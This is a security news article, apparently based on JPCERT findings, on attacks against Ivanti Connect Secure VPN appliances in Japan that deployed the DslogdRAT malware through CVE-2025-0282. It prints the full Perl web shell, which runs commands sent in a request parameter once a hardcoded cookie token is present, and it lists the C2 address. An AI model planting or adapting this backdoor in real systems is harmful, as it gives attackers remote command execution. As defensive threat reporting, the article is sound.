Recent attacks against Japanese organizations have revealed sophisticated hackers exploiting a zero-day vulnerability in Ivanti Connect Secure VPN appliances.
The attacks, occurring around December 2024, leveraged CVE-2025-0282 to deploy multiple malicious tools, including a custom malware called DslogdRAT and a specially crafted web shell.
These tools allowed attackers to establish persistent access to compromised systems and execute arbitrary commands remotely.
.png
)
The threat actors demonstrated advanced capabilities by chaining the zero-day exploit with custom malware deployment techniques.
After compromising the VPN appliances, attackers installed a Perl-based web shell that served as an initial foothold, enabling them to deploy additional malware components including DslogdRAT.
This multi-stage attack approach shows methodical planning and technical sophistication in targeting secure network infrastructure.
JPCERT analysts identified that the DslogdRAT malware was designed with specific evasion capabilities, notably operating only during business hours between 8:00 AM and 8:00 PM.
This calculated approach helped attackers blend their malicious traffic with legitimate business operations, significantly reducing the chances of detection while maintaining persistent access to compromised environments.
The campaign appears to be related to activities attributed to a suspected China-nexus threat actor.
In addition to DslogdRAT, researchers also identified another malware variant called SPAWNSNARE on the same compromised systems, indicating a coordinated and well-resourced attack operation.
Both Google and CISA have previously reported on similar campaigns in April 2025, suggesting a continued effort targeting Ivanti products.
Security experts warn that these attacks represent an ongoing threat, with Ivanti Connect Secure products remaining a high-value target.
The vendor has recently addressed another critical vulnerability (CVE-2025-22457), but organizations are urged to maintain vigilance as attacks are expected to continue.
DslogdRAT Technical Analysis
DslogdRAT employs a sophisticated execution flow designed to evade detection mechanisms. Upon execution, the malware’s main process creates a child process before immediately terminating itself.
The first child process then decodes XOR-encrypted configuration data (using 0x63 as the key) and spawns a second child process containing the core functionality.
.webp)
This process isolation technique helps bypass security solutions that monitor single-process behaviors or that terminate when parent processes end.
The attackers initially gained access through a deceptively simple yet effective Perl-based web shell deployed at “/home/webserver/htdocs/dana-na/cc/ccupdate.cgi”.
The web shell code reveals how attackers established their initial foothold:-
use CGI; my $cookie_str = $ENV{HTTP_COOKIE};
if($cookie_str =~ /DSAUTOKEN=([^;]+)/) {
if($1 eq 'af95380019083db5') {
print CGI:: header( -type => 'text/html' );
my $data = CGI::param('data');
system($data);
exit(0);
}
}This code allows attackers to execute arbitrary commands by simply sending HTTP requests with a specific cookie value “DSAUTOKEN=af95380019083db5” and including the command to run in the “data” parameter.
The straightforward nature of this backdoor highlights how even simple code can create significant security breaches when deployed in critical infrastructure.
Communication between DslogdRAT and its command and control server (3.112.192.119:443) uses a custom encoding mechanism.
The data exchanged is obfuscated using a simple XOR operation that applies keys from 0x01 to 0x07 in a rotating pattern across 7-byte blocks.
This technique, while not highly sophisticated, provides sufficient obfuscation to avoid basic network traffic analysis while supporting multiple command functions including file transfers, shell command execution, and proxy capabilities.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy
